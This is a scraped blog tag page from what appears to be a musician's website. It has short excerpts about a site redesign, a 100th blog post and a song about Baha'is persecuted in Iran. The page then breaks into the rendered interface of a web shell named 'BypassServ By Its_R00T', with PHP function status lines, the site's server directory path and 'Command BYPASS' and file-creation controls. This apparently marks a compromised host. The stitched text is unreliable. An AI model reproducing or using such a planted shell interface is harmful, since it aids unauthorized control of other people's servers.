Tag : free download

A New Look…

We’ve made changes to the website!  We realized that it was starting to become busy with all the new information on there and we wanted to make the website more organized.  Here are a few of the recent changes: Restructuring ..

For my 100th blog – A gift of music

I’m thrilled to be writing my 100th blog! It has been an enlightening experience to have the opportunity to share my thoughts and to exchange ideas with friends.  I have enjoyed sharing thoughts on the theme of detachment, challenges in ..

New song 'Persecution' dedicated to Baha'is in Iran

I am moved to share with you, Persecution, the new song I wrote about in my previous post about the persecution of the Baha’is in Iran, and the unjust arrest of 7 Baha’i leaders there. You can hear it right ..

BypassServ By Its_R00T
[ Function mail() ] : [ ON ]
[ Function putenv() ] : [ ON ]

DIR: //home/u380431374/domains/elikamahony.com/public_html / [ GO Home ]

Command BYPASS
Command BIASA
Create Folder
Create File

Item Name
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